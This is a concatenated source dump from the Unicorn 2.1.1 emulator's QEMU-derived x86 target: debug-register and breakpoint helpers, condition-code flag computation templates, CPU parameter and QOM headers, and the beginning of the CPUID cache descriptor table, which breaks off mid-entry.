*bp; if (cs->watchpoint_hit) { if (cs->watchpoint_hit->flags & BP_CPU) { cs->watchpoint_hit = NULL; if (check_hw_breakpoints(env, false)) { raise_exception(env, EXCP01_DB); } else { cpu_loop_exit_noexc(cs); } } } else { QTAILQ_FOREACH(bp, &cs->breakpoints, entry) { if (bp->pc == env->eip) { if (bp->flags & BP_CPU) { check_hw_breakpoints(env, true); raise_exception(env, EXCP01_DB); } break; } } } } void helper_single_step(CPUX86State *env) { check_hw_breakpoints(env, true); env->dr[6] |= DR6_BS; raise_exception(env, EXCP01_DB); } void helper_rechecking_single_step(CPUX86State *env) { if ((env->eflags & TF_MASK) != 0) { helper_single_step(env); } } void helper_set_dr(CPUX86State *env, int reg, target_ulong t0) { switch (reg) { case 0: case 1: case 2: case 3: if (hw_breakpoint_enabled(env->dr[7], reg) && hw_breakpoint_type(env->dr[7], reg) != DR7_TYPE_IO_RW) { hw_breakpoint_remove(env, reg); env->dr[reg] = t0; hw_breakpoint_insert(env, reg); } else { env->dr[reg] = t0; } return; case 4: if (env->cr[4] & CR4_DE_MASK) { break; } /* fallthru */ case 6: env->dr[6] = t0 | DR6_FIXED_1; return; case 5: if (env->cr[4] & CR4_DE_MASK) { break; } /* fallthru */ case 7: cpu_x86_update_dr7(env, t0); return; } raise_exception_err_ra(env, EXCP06_ILLOP, 0, GETPC()); } target_ulong helper_get_dr(CPUX86State *env, int reg) { switch (reg) { case 0: case 1: case 2: case 3: case 6: case 7: return env->dr[reg]; case 4: if (env->cr[4] & CR4_DE_MASK) { break; } else { return env->dr[6]; } case 5: if (env->cr[4] & CR4_DE_MASK) { break; } else { return env->dr[7]; } } raise_exception_err_ra(env, EXCP06_ILLOP, 0, GETPC()); } /* Check if Port I/O is trapped by a breakpoint. 
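 * An enabled DR7_TYPE_IO_RW breakpoint of length N at dr[i] matches
 * any access overlapping [dr[i], dr[i] + N - 1]; all matching
 * breakpoints are merged into DR6 before the #DB is raised.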
 */
void helper_bpt_io(CPUX86State *env, uint32_t port,
                   uint32_t size, target_ulong next_eip)
{
    target_ulong dr7 = env->dr[7];
    int i, hit = 0;

    for (i = 0; i < DR7_MAX_BP; ++i) {
        if (hw_breakpoint_type(dr7, i) == DR7_TYPE_IO_RW
            && hw_breakpoint_enabled(dr7, i)) {
            int bpt_len = hw_breakpoint_len(dr7, i);
            if (port + size - 1 >= env->dr[i]
                && port <= env->dr[i] + bpt_len - 1) {
                hit |= 1 << i;
            }
        }
    }

    if (hit) {
        env->dr[6] = (env->dr[6] & ~0xf) | hit;
        env->eip = next_eip;
        raise_exception(env, EXCP01_DB);
    }
}

unicorn-2.1.1/qemu/target/i386/cc_helper.c

/*
 * x86 condition code helpers
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" const uint8_t parity_table[256] = { CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, }; #define SHIFT 0 #include "cc_helper_template.h" #undef SHIFT #define SHIFT 1 #include "cc_helper_template.h" #undef SHIFT #define SHIFT 2 #include "cc_helper_template.h" #undef SHIFT #ifdef TARGET_X86_64 #define SHIFT 3 #include "cc_helper_template.h" #undef SHIFT #endif static target_ulong compute_all_adcx(target_ulong dst, target_ulong src1, target_ulong src2) { return (src1 & ~CC_C) | (dst * CC_C); } static target_ulong compute_all_adox(target_ulong dst, target_ulong src1, target_ulong src2) { return (src1 & ~CC_O) | (src2 * CC_O); } static target_ulong compute_all_adcox(target_ulong dst, target_ulong src1, target_ulong src2) { return (src1 & ~(CC_C | CC_O)) | (dst * CC_C) | (src2 * CC_O); } target_ulong helper_cc_compute_all(target_ulong dst, target_ulong src1, target_ulong src2, int op) { switch (op) { default: /* should never happen */ return 0; case CC_OP_EFLAGS: return src1; case CC_OP_CLR: return CC_Z | CC_P; case CC_OP_POPCNT: return src1 ? 
0 : CC_Z; case CC_OP_MULB: return compute_all_mulb(dst, src1); case CC_OP_MULW: return compute_all_mulw(dst, src1); case CC_OP_MULL: return compute_all_mull(dst, src1); case CC_OP_ADDB: return compute_all_addb(dst, src1); case CC_OP_ADDW: return compute_all_addw(dst, src1); case CC_OP_ADDL: return compute_all_addl(dst, src1); case CC_OP_ADCB: return compute_all_adcb(dst, src1, src2); case CC_OP_ADCW: return compute_all_adcw(dst, src1, src2); case CC_OP_ADCL: return compute_all_adcl(dst, src1, src2); case CC_OP_SUBB: return compute_all_subb(dst, src1); case CC_OP_SUBW: return compute_all_subw(dst, src1); case CC_OP_SUBL: return compute_all_subl(dst, src1); case CC_OP_SBBB: return compute_all_sbbb(dst, src1, src2); case CC_OP_SBBW: return compute_all_sbbw(dst, src1, src2); case CC_OP_SBBL: return compute_all_sbbl(dst, src1, src2); case CC_OP_LOGICB: return compute_all_logicb(dst, src1); case CC_OP_LOGICW: return compute_all_logicw(dst, src1); case CC_OP_LOGICL: return compute_all_logicl(dst, src1); case CC_OP_INCB: return compute_all_incb(dst, src1); case CC_OP_INCW: return compute_all_incw(dst, src1); case CC_OP_INCL: return compute_all_incl(dst, src1); case CC_OP_DECB: return compute_all_decb(dst, src1); case CC_OP_DECW: return compute_all_decw(dst, src1); case CC_OP_DECL: return compute_all_decl(dst, src1); case CC_OP_SHLB: return compute_all_shlb(dst, src1); case CC_OP_SHLW: return compute_all_shlw(dst, src1); case CC_OP_SHLL: return compute_all_shll(dst, src1); case CC_OP_SARB: return compute_all_sarb(dst, src1); case CC_OP_SARW: return compute_all_sarw(dst, src1); case CC_OP_SARL: return compute_all_sarl(dst, src1); case CC_OP_BMILGB: return compute_all_bmilgb(dst, src1); case CC_OP_BMILGW: return compute_all_bmilgw(dst, src1); case CC_OP_BMILGL: return compute_all_bmilgl(dst, src1); case CC_OP_ADCX: return compute_all_adcx(dst, src1, src2); case CC_OP_ADOX: return compute_all_adox(dst, src1, src2); case CC_OP_ADCOX: return compute_all_adcox(dst, src1, src2); #ifdef TARGET_X86_64 case CC_OP_MULQ: return compute_all_mulq(dst, src1); case CC_OP_ADDQ: return compute_all_addq(dst, src1); case CC_OP_ADCQ: return compute_all_adcq(dst, src1, src2); case CC_OP_SUBQ: return compute_all_subq(dst, src1); case CC_OP_SBBQ: return compute_all_sbbq(dst, src1, src2); case CC_OP_LOGICQ: return compute_all_logicq(dst, src1); case CC_OP_INCQ: return compute_all_incq(dst, src1); case CC_OP_DECQ: return compute_all_decq(dst, src1); case CC_OP_SHLQ: return compute_all_shlq(dst, src1); case CC_OP_SARQ: return compute_all_sarq(dst, src1); case CC_OP_BMILGQ: return compute_all_bmilgq(dst, src1); #endif } } uint32_t cpu_cc_compute_all(CPUX86State *env, int op) { return (uint32_t)helper_cc_compute_all(CC_DST, CC_SRC, CC_SRC2, op); } target_ulong helper_cc_compute_c(target_ulong dst, target_ulong src1, target_ulong src2, int op) { switch (op) { default: /* should never happen */ case CC_OP_LOGICB: case CC_OP_LOGICW: case CC_OP_LOGICL: case CC_OP_LOGICQ: case CC_OP_CLR: case CC_OP_POPCNT: return 0; case CC_OP_EFLAGS: case CC_OP_SARB: case CC_OP_SARW: case CC_OP_SARL: case CC_OP_SARQ: case CC_OP_ADOX: return src1 & 1; case CC_OP_INCB: case CC_OP_INCW: case CC_OP_INCL: case CC_OP_INCQ: case CC_OP_DECB: case CC_OP_DECW: case CC_OP_DECL: case CC_OP_DECQ: return src1; case CC_OP_MULB: case CC_OP_MULW: case CC_OP_MULL: case CC_OP_MULQ: return src1 != 0; case CC_OP_ADCX: case CC_OP_ADCOX: return dst; case CC_OP_ADDB: return compute_c_addb(dst, src1); case CC_OP_ADDW: return compute_c_addw(dst, src1); case CC_OP_ADDL: 
        return compute_c_addl(dst, src1);
    case CC_OP_ADCB:
        return compute_c_adcb(dst, src1, src2);
    case CC_OP_ADCW:
        return compute_c_adcw(dst, src1, src2);
    case CC_OP_ADCL:
        return compute_c_adcl(dst, src1, src2);
    case CC_OP_SUBB:
        return compute_c_subb(dst, src1);
    case CC_OP_SUBW:
        return compute_c_subw(dst, src1);
    case CC_OP_SUBL:
        return compute_c_subl(dst, src1);
    case CC_OP_SBBB:
        return compute_c_sbbb(dst, src1, src2);
    case CC_OP_SBBW:
        return compute_c_sbbw(dst, src1, src2);
    case CC_OP_SBBL:
        return compute_c_sbbl(dst, src1, src2);
    case CC_OP_SHLB:
        return compute_c_shlb(dst, src1);
    case CC_OP_SHLW:
        return compute_c_shlw(dst, src1);
    case CC_OP_SHLL:
        return compute_c_shll(dst, src1);
    case CC_OP_BMILGB:
        return compute_c_bmilgb(dst, src1);
    case CC_OP_BMILGW:
        return compute_c_bmilgw(dst, src1);
    case CC_OP_BMILGL:
        return compute_c_bmilgl(dst, src1);
#ifdef TARGET_X86_64
    case CC_OP_ADDQ:
        return compute_c_addq(dst, src1);
    case CC_OP_ADCQ:
        return compute_c_adcq(dst, src1, src2);
    case CC_OP_SUBQ:
        return compute_c_subq(dst, src1);
    case CC_OP_SBBQ:
        return compute_c_sbbq(dst, src1, src2);
    case CC_OP_SHLQ:
        return compute_c_shlq(dst, src1);
    case CC_OP_BMILGQ:
        return compute_c_bmilgq(dst, src1);
#endif
    }
}

void helper_write_eflags(CPUX86State *env, target_ulong t0,
                         uint32_t update_mask)
{
    cpu_load_eflags(env, (int)t0, update_mask);
}

target_ulong helper_read_eflags(CPUX86State *env)
{
    return cpu_compute_eflags(env);
}

void helper_clts(CPUX86State *env)
{
    env->cr[0] &= ~CR0_TS_MASK;
    env->hflags &= ~HF_TS_MASK;
}

void helper_reset_rf(CPUX86State *env)
{
    env->eflags &= ~RF_MASK;
}

void helper_cli(CPUX86State *env)
{
    env->eflags &= ~IF_MASK;
}

void helper_sti(CPUX86State *env)
{
    env->eflags |= IF_MASK;
}

void helper_clac(CPUX86State *env)
{
    env->eflags &= ~AC_MASK;
}

void helper_stac(CPUX86State *env)
{
    env->eflags |= AC_MASK;
}

#if 0
/* vm86plus instructions */
void helper_cli_vm(CPUX86State *env)
{
    env->eflags &= ~VIF_MASK;
}

void helper_sti_vm(CPUX86State *env)
{
    env->eflags |= VIF_MASK;
    if (env->eflags & VIP_MASK) {
        raise_exception_ra(env, EXCP0D_GPF, GETPC());
    }
}
#endif

unicorn-2.1.1/qemu/target/i386/cc_helper_template.h

/*
 * x86 condition code helpers
 *
 * Copyright (c) 2008 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #define DATA_BITS (1 << (3 + SHIFT)) #if DATA_BITS == 8 #define SUFFIX b #define DATA_TYPE uint8_t #elif DATA_BITS == 16 #define SUFFIX w #define DATA_TYPE uint16_t #elif DATA_BITS == 32 #define SUFFIX l #define DATA_TYPE uint32_t #elif DATA_BITS == 64 #define SUFFIX q #define DATA_TYPE uint64_t #else #error unhandled operand size #endif #define SIGN_MASK (((DATA_TYPE)1) << (DATA_BITS - 1)) /* dynamic flags computation */ static int glue(compute_all_add, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { int cf, pf, af, zf, sf, of; DATA_TYPE src2 = dst - src1; cf = dst < src1; pf = parity_table[(uint8_t)dst]; af = (dst ^ src1 ^ src2) & CC_A; zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; of = lshift((src1 ^ src2 ^ -1) & (src1 ^ dst), 12 - DATA_BITS) & CC_O; return cf | pf | af | zf | sf | of; } static int glue(compute_c_add, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { return dst < src1; } static int glue(compute_all_adc, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1, DATA_TYPE src3) { int cf, pf, af, zf, sf, of; DATA_TYPE src2 = dst - src1 - src3; cf = (src3 ? dst <= src1 : dst < src1); pf = parity_table[(uint8_t)dst]; af = (dst ^ src1 ^ src2) & 0x10; zf = (dst == 0) << 6; sf = lshift(dst, 8 - DATA_BITS) & 0x80; of = lshift((src1 ^ src2 ^ -1) & (src1 ^ dst), 12 - DATA_BITS) & CC_O; return cf | pf | af | zf | sf | of; } static int glue(compute_c_adc, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1, DATA_TYPE src3) { return src3 ? dst <= src1 : dst < src1; } static int glue(compute_all_sub, SUFFIX)(DATA_TYPE dst, DATA_TYPE src2) { int cf, pf, af, zf, sf, of; DATA_TYPE src1 = dst + src2; cf = src1 < src2; pf = parity_table[(uint8_t)dst]; af = (dst ^ src1 ^ src2) & CC_A; zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; of = lshift((src1 ^ src2) & (src1 ^ dst), 12 - DATA_BITS) & CC_O; return cf | pf | af | zf | sf | of; } static int glue(compute_c_sub, SUFFIX)(DATA_TYPE dst, DATA_TYPE src2) { DATA_TYPE src1 = dst + src2; return src1 < src2; } static int glue(compute_all_sbb, SUFFIX)(DATA_TYPE dst, DATA_TYPE src2, DATA_TYPE src3) { int cf, pf, af, zf, sf, of; DATA_TYPE src1 = dst + src2 + src3; cf = (src3 ? src1 <= src2 : src1 < src2); pf = parity_table[(uint8_t)dst]; af = (dst ^ src1 ^ src2) & 0x10; zf = (dst == 0) << 6; sf = lshift(dst, 8 - DATA_BITS) & 0x80; of = lshift((src1 ^ src2) & (src1 ^ dst), 12 - DATA_BITS) & CC_O; return cf | pf | af | zf | sf | of; } static int glue(compute_c_sbb, SUFFIX)(DATA_TYPE dst, DATA_TYPE src2, DATA_TYPE src3) { DATA_TYPE src1 = dst + src2 + src3; return (src3 ? 
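/* src1 was reconstructed above as the original minuend (dst + src2 + src3); SBB borrows when src1 < src2, and with a borrow-in (src3 != 0) the equal case borrows as well: */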
src1 <= src2 : src1 < src2); } static int glue(compute_all_logic, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { int cf, pf, af, zf, sf, of; cf = 0; pf = parity_table[(uint8_t)dst]; af = 0; zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; of = 0; return cf | pf | af | zf | sf | of; } static int glue(compute_all_inc, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { int cf, pf, af, zf, sf, of; DATA_TYPE src2; cf = (int)src1; src1 = dst - 1; src2 = 1; pf = parity_table[(uint8_t)dst]; af = (dst ^ src1 ^ src2) & CC_A; zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; of = (dst == SIGN_MASK) * CC_O; return cf | pf | af | zf | sf | of; } static int glue(compute_all_dec, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { int cf, pf, af, zf, sf, of; DATA_TYPE src2; cf = (int)src1; src1 = dst + 1; src2 = 1; pf = parity_table[(uint8_t)dst]; af = (dst ^ src1 ^ src2) & CC_A; zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; of = (dst == SIGN_MASK - 1) * CC_O; return cf | pf | af | zf | sf | of; } static int glue(compute_all_shl, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { int cf, pf, af, zf, sf, of; cf = (src1 >> (DATA_BITS - 1)) & CC_C; pf = parity_table[(uint8_t)dst]; af = 0; /* undefined */ zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; /* of is defined iff shift count == 1 */ of = lshift(src1 ^ dst, 12 - DATA_BITS) & CC_O; return cf | pf | af | zf | sf | of; } static int glue(compute_c_shl, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { return (src1 >> (DATA_BITS - 1)) & CC_C; } static int glue(compute_all_sar, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { int cf, pf, af, zf, sf, of; cf = src1 & 1; pf = parity_table[(uint8_t)dst]; af = 0; /* undefined */ zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; /* of is defined iff shift count == 1 */ of = lshift(src1 ^ dst, 12 - DATA_BITS) & CC_O; return cf | pf | af | zf | sf | of; } /* NOTE: we compute the flags like the P4. On older CPUs, only OF and CF are modified and it is slower to do that. Note as well that we don't truncate SRC1 for computing carry to DATA_TYPE.
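As a concrete example (assuming, as the callers appear to guarantee, that src1 holds the part of the product that overflowed DATA_TYPE): an 8-bit MUL leaving dst = 0x40 with src1 != 0 yields CF = OF = 1 and ZF = SF = 0, while src1 == 0 clears both CF and OF.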
*/ static int glue(compute_all_mul, SUFFIX)(DATA_TYPE dst, target_long src1) { int cf, pf, af, zf, sf, of; cf = (src1 != 0); pf = parity_table[(uint8_t)dst]; af = 0; /* undefined */ zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; of = cf * CC_O; return cf | pf | af | zf | sf | of; } static int glue(compute_all_bmilg, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { int cf, pf, af, zf, sf, of; cf = (src1 == 0); pf = 0; /* undefined */ af = 0; /* undefined */ zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; of = 0; return cf | pf | af | zf | sf | of; } static int glue(compute_c_bmilg, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { return src1 == 0; } #undef DATA_BITS #undef SIGN_MASK #undef DATA_TYPE #undef DATA_MASK #undef SUFFIX
unicorn-2.1.1/qemu/target/i386/cpu-param.h
/* * i386 cpu parameters for qemu. * * Copyright (c) 2003 Fabrice Bellard * SPDX-License-Identifier: LGPL-2.0+ */ #ifndef I386_CPU_PARAM_H #define I386_CPU_PARAM_H 1 #ifdef TARGET_X86_64 # define TARGET_LONG_BITS 64 # define TARGET_PHYS_ADDR_SPACE_BITS 52 /* * ??? This is really 48 bits, sign-extended, but the only thing * accessible to userland with bit 48 set is the VSYSCALL, and that * is handled via other mechanisms. */ # define TARGET_VIRT_ADDR_SPACE_BITS 47 #else # define TARGET_LONG_BITS 32 # define TARGET_PHYS_ADDR_SPACE_BITS 36 # define TARGET_VIRT_ADDR_SPACE_BITS 32 #endif #define TARGET_PAGE_BITS 12 #define NB_MMU_MODES 3 #endif
unicorn-2.1.1/qemu/target/i386/cpu-qom.h
/* * QEMU x86 CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version.
* * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see * <http://www.gnu.org/licenses/lgpl-2.1.html> */ #ifndef QEMU_I386_CPU_QOM_H #define QEMU_I386_CPU_QOM_H #include "hw/core/cpu.h" typedef struct X86CPUModel X86CPUModel; /** * X86CPUClass: * @cpu_def: CPU model definition * @host_cpuid_required: Whether CPU model requires cpuid from host. * @ordering: Ordering on the "-cpu help" CPU model list. * @migration_safe: See CpuDefinitionInfo::migration_safe * @static_model: See CpuDefinitionInfo::static * @parent_realize: The parent class' realize handler. * @parent_reset: The parent class' reset handler. * * An x86 CPU model or family. */ typedef struct X86CPUClass { /*< private >*/ CPUClass parent_class; /*< public >*/ /* CPU definition, automatically loaded by instance_init if not NULL. * Should be eventually replaced by subclass-specific property defaults. */ X86CPUModel *model; bool host_cpuid_required; int ordering; bool static_model; /* Optional description of CPU model. * If unavailable, cpu_def->model_id is used */ const char *model_description; void (*parent_reset)(CPUState *cpu); } X86CPUClass; typedef struct X86CPU X86CPU; #endif
unicorn-2.1.1/qemu/target/i386/cpu.c
/* * i386 CPUID helper functions * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #include "qemu/osdep.h" #include "qemu/units.h" #include "qemu/cutils.h" #include "qemu/bitops.h" #include "cpu.h" #include "exec/exec-all.h" #include "sysemu/cpus.h" #include "sysemu/sysemu.h" #include "sysemu/tcg.h" #include "hw/i386/topology.h" #include "uc_priv.h" static void x86_cpuid_version_set_family(X86CPU *cpu, int64_t value); static void x86_cpuid_version_set_model(X86CPU *cpu, int64_t value); static void x86_cpuid_version_set_stepping(X86CPU *cpu, int64_t value); static void x86_cpuid_set_model_id(X86CPU *cpu, const char* model_id); static void x86_cpuid_set_vendor(X86CPU *cpu, const char *value); /* Helpers for building CPUID[2] descriptors: */ struct CPUID2CacheDescriptorInfo { enum CacheType type; int level; int size; int line_size; int associativity; }; /* * Known CPUID 2 cache descriptors. * From Intel SDM Volume 2A, CPUID instruction */ static struct CPUID2CacheDescriptorInfo cpuid2_cache_descriptors[] = { [0x06] = { .level = 1, .type = INSTRUCTION_CACHE, .size = 8 * KiB, .associativity = 4, .line_size = 32, }, [0x08] = { .level = 1, .type = INSTRUCTION_CACHE, .size = 16 * KiB, .associativity = 4, .line_size = 32, }, [0x09] = { .level = 1, .type = INSTRUCTION_CACHE, .size = 32 * KiB, .associativity = 4, .line_size = 64, }, [0x0A] = { .level = 1, .type = DATA_CACHE, .size = 8 * KiB, .associativity = 2, .line_size = 32, }, [0x0C] = { .level = 1, .type = DATA_CACHE, .size = 16 * KiB, .associativity = 4, .line_size = 32, }, [0x0D] = { .level = 1, .type = DATA_CACHE, .size = 16 * KiB, .associativity = 4, .line_size = 64, }, [0x0E] = { .level = 1, .type = DATA_CACHE, .size = 24 * KiB, .associativity = 6, .line_size = 64, }, [0x1D] = { .level = 2, .type = UNIFIED_CACHE, .size = 128 * KiB, .associativity = 2, .line_size = 64, }, [0x21] = { .level = 2, .type = UNIFIED_CACHE, .size = 256 * KiB, .associativity = 8, .line_size = 64, }, /* lines per sector is not supported by cpuid2_cache_descriptor(), * so descriptors 0x22, 0x23 are not included */ [0x24] = { .level = 2, .type = UNIFIED_CACHE, .size = 1 * MiB, .associativity = 16, .line_size = 64, }, /* lines per sector is not supported by cpuid2_cache_descriptor(), * so descriptors 0x25, 0x20 are not included */ [0x2C] = { .level = 1, .type = DATA_CACHE, .size = 32 * KiB, .associativity = 8, .line_size = 64, }, [0x30] = { .level = 1, .type = INSTRUCTION_CACHE, .size = 32 * KiB, .associativity = 8, .line_size = 64, }, [0x41] = { .level = 2, .type = UNIFIED_CACHE, .size = 128 * KiB, .associativity = 4, .line_size = 32, }, [0x42] = { .level = 2, .type = UNIFIED_CACHE, .size = 256 * KiB, .associativity = 4, .line_size = 32, }, [0x43] = { .level = 2, .type = UNIFIED_CACHE, .size = 512 * KiB, .associativity = 4, .line_size = 32, }, [0x44] = { .level = 2, .type = UNIFIED_CACHE, .size = 1 * MiB, .associativity = 4, .line_size = 32, }, [0x45] = { .level = 2, .type = UNIFIED_CACHE, .size = 2 * MiB, .associativity = 4, .line_size = 32, }, [0x46] = { .level = 3, .type = UNIFIED_CACHE, .size = 4 * MiB, .associativity = 4, .line_size = 64, }, [0x47] = { .level = 3, .type = UNIFIED_CACHE, .size = 8 * MiB, .associativity = 8, .line_size = 64, }, [0x48] = { .level = 2, .type = UNIFIED_CACHE, .size = 3 * MiB, .associativity = 12, .line_size = 64, }, /* Descriptor 0x49 depends on CPU family/model, so it is not included */ [0x4A] = { .level = 3, .type = UNIFIED_CACHE, .size = 6 * MiB, .associativity = 12, .line_size = 64, }, [0x4B] = { .level = 3, .type = UNIFIED_CACHE, .size = 8 * MiB, .associativity = 16, .line_size = 64, }, [0x4C] = { .level = 3,
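/* (entry continues below; the array index, 0x4C here, is itself the descriptor byte that cpuid2_cache_descriptor() returns on a match) */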
.type = UNIFIED_CACHE, .size = 12 * MiB, .associativity = 12, .line_size = 64, }, [0x4D] = { .level = 3, .type = UNIFIED_CACHE, .size = 16 * MiB, .associativity = 16, .line_size = 64, }, [0x4E] = { .level = 2, .type = UNIFIED_CACHE, .size = 6 * MiB, .associativity = 24, .line_size = 64, }, [0x60] = { .level = 1, .type = DATA_CACHE, .size = 16 * KiB, .associativity = 8, .line_size = 64, }, [0x66] = { .level = 1, .type = DATA_CACHE, .size = 8 * KiB, .associativity = 4, .line_size = 64, }, [0x67] = { .level = 1, .type = DATA_CACHE, .size = 16 * KiB, .associativity = 4, .line_size = 64, }, [0x68] = { .level = 1, .type = DATA_CACHE, .size = 32 * KiB, .associativity = 4, .line_size = 64, }, [0x78] = { .level = 2, .type = UNIFIED_CACHE, .size = 1 * MiB, .associativity = 4, .line_size = 64, }, /* lines per sector is not supported by cpuid2_cache_descriptor(), * so descriptors 0x79, 0x7A, 0x7B, 0x7C are not included. */ [0x7D] = { .level = 2, .type = UNIFIED_CACHE, .size = 2 * MiB, .associativity = 8, .line_size = 64, }, [0x7F] = { .level = 2, .type = UNIFIED_CACHE, .size = 512 * KiB, .associativity = 2, .line_size = 64, }, [0x80] = { .level = 2, .type = UNIFIED_CACHE, .size = 512 * KiB, .associativity = 8, .line_size = 64, }, [0x82] = { .level = 2, .type = UNIFIED_CACHE, .size = 256 * KiB, .associativity = 8, .line_size = 32, }, [0x83] = { .level = 2, .type = UNIFIED_CACHE, .size = 512 * KiB, .associativity = 8, .line_size = 32, }, [0x84] = { .level = 2, .type = UNIFIED_CACHE, .size = 1 * MiB, .associativity = 8, .line_size = 32, }, [0x85] = { .level = 2, .type = UNIFIED_CACHE, .size = 2 * MiB, .associativity = 8, .line_size = 32, }, [0x86] = { .level = 2, .type = UNIFIED_CACHE, .size = 512 * KiB, .associativity = 4, .line_size = 64, }, [0x87] = { .level = 2, .type = UNIFIED_CACHE, .size = 1 * MiB, .associativity = 8, .line_size = 64, }, [0xD0] = { .level = 3, .type = UNIFIED_CACHE, .size = 512 * KiB, .associativity = 4, .line_size = 64, }, [0xD1] = { .level = 3, .type = UNIFIED_CACHE, .size = 1 * MiB, .associativity = 4, .line_size = 64, }, [0xD2] = { .level = 3, .type = UNIFIED_CACHE, .size = 2 * MiB, .associativity = 4, .line_size = 64, }, [0xD6] = { .level = 3, .type = UNIFIED_CACHE, .size = 1 * MiB, .associativity = 8, .line_size = 64, }, [0xD7] = { .level = 3, .type = UNIFIED_CACHE, .size = 2 * MiB, .associativity = 8, .line_size = 64, }, [0xD8] = { .level = 3, .type = UNIFIED_CACHE, .size = 4 * MiB, .associativity = 8, .line_size = 64, }, [0xDC] = { .level = 3, .type = UNIFIED_CACHE, .size = 1.5 * MiB, .associativity = 12, .line_size = 64, }, [0xDD] = { .level = 3, .type = UNIFIED_CACHE, .size = 3 * MiB, .associativity = 12, .line_size = 64, }, [0xDE] = { .level = 3, .type = UNIFIED_CACHE, .size = 6 * MiB, .associativity = 12, .line_size = 64, }, [0xE2] = { .level = 3, .type = 